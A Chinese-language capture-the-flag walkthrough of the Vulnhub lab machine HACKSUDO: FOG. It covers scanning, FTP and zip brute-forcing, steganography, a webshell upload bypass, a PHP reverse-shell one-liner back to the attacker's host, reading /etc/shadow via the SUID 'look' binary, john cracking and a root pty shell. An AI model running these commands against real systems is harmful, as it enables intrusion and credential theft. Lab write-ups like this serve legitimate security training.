环境
Kali: 192.168.132.131
靶机:192.168.132.146
靶机地址:https://www.vulnhub.com/entry/hacksudo-fog,697/
一、信息收集
nmap -sP 192.168.132.0/24
![图片[1]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121342-62444976ccc3a.png)
nmap -p- -sC -sV 192.168.132.146
![图片[2]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121342-62444976f12ea.png)
![图片[3]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121343-6244497736072.png)
gobuster dir -u http://192.168.132.146 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 400,403,404,500 -t 100 -x .php,.html,.txt,.bak,.zip
![图片[4]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121343-624449775f4c8.png)
二、漏洞探测
http://192.168.132.146/index1.html
查看源代码,发现提示,提供一个脚本用来分离音频中的私密信息(目前不知道干什么用)
![图片[5]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121343-624449778c8d1.png)
#该靶机可能需要暴力破解密码
http://192.168.132.146/dict.txt
![图片[6]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121343-62444977af37d.png)
http://192.168.132.146/fog/
存在目录遍历漏洞,但是没有文件
http://192.168.132.146/cms/
发现可能是用户名
![图片[7]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121343-62444977ce8cb.png)
靶机中开启ftp服务,有用户名尝试利用获得字典文件进行暴力破解,获得密码
medusa -M ftp -h 192.168.132.146 -u hacksudo -P /tmp/dict.txt
hydra -l hacksudo -P dict.txt ftp://192.168.132.146 ### 两个都可以
![图片[8]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121343-62444977e75f4.png)
登录ftp,下载文件flag1.txt和secr3tSteg.zip文件
![图片[9]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121344-624449782c163.png)
获得提示
![图片[10]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121344-624449784fa63.png)
解压文件,发现有密码,暴力破解zip文件,密码为:fooled
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt secr3tSteg.zip
![图片[11]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121344-624449786b73e.png)
解压文件
unzip secr3tSteg.zip
![图片[12]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121344-62444978816b0.png)
使用提供的脚本查看隐藏信息
python3 ExWave.py -f /root/hacksudoSTEGNO.wav
![图片[13]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121344-6244497891c9f.png)
根据前两行,可以判断为凯撒密码,进行解密,得到用户fog的密码
![图片[14]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121344-62444978b34a1.png)
wwww.localhost/fog Username=fog:password=hacksudoISRO
三、漏洞验证
利用刚刚得到的密码登录,在cms界面进行登录
![图片[15]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121345-6244497917753.png)
在站点中可以上传一句话木马文件,站点检测上传文件是否危险,修改后缀名,进行绕过,上传之后在修改文件后缀名
![图片[16]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121345-6244497931e0c.png)
也可以找到cmsmsrce.txt,存在一句话木马,修改文件后缀名成php,进行反弹获得shell
http://192.168.132.146/cms/uploads/cmsmsrce.txt
![图片[17]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121345-62444979766ef.png)
反弹代码
php -r '$sock=fsockopen("192.168.132.131",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
需要将传递内容,进行url编码
http://192.168.132.146/cms/uploads/shell.php?cmd=php%20-r%20'%24sock%3dfsockopen(%22192.168.132.131%22%2c4444)%3bexec(%22%2fbin%2fsh%20-i%20%3c%263%20%3e%263%202%3e%263%22)%3b'
开启监听端口,反弹获得shell
![图片[18]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121345-6244497985130.png)
四、提权
#查找高权限命令
find / -perm -u=s -type f 2>/dev/null
![图片[19]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121345-624449799cb7f.png)
look '' /etc/shadow
![图片[20]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/03/20220330121345-62444979bea01.png)
破解isro用户的密码
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
![图片[21]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/03/image-278-1024x209.png)
使用isro的密码登录ssh
ssh isro@192.168.132.146
![图片[22]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/03/image-279.png)
在/home/isro/fog中,找到了一个root用户的可执行文件。
![图片[23]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/03/image-280-1024x147.png)
运行fog,获取python shell,检查id,它的权限是root。
![图片[24]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/03/image-281.png)
使用python的pty库获得root的shell
import pty; pty.spawn("/bin/bash")
![图片[25]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/03/image-282-1024x178.png)
获得flag flag {4356a779ce18252fa1dd2d2b6ab56b19}
![图片[26]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/03/image-283-1024x530.png)
五、总结
这套靶机难易程度容易,使用nmap扫描靶机,使用gobuster扫描目录,在网站目录index1.html源码中发现提供一个脚本(分离音频中的私密信息),在网站目录dict.txt可能时密码字典,在网站cms目录发现可能是用户名,使用medusa工具使用发现的用户名和密码字典进行暴力破解,登录下载文件,发现flag,zip文件存在密码,使用fcrackzip工具进行破解密码,解压文件,使用提供的脚本查看隐藏信息,根据前两行,可以判断为凯撒密码,进行解密,得到用户fog的密码,在cms界面进行登录,安装插件,上传一句话,获得shell,查找高权限命令,使用高权限命令look查看/etc/shadow,破解isro用户密码,在/home/isro/fog中,找到了一个root用户的可执行文件,为root权限的python解释器,使用python的pty库获得root的shell。
本文参考来源于:
本文作者:纸机
本文链接:https://www.cnblogs.com/confidant/archive/2021/09/24/15332903.html
请登录后查看评论内容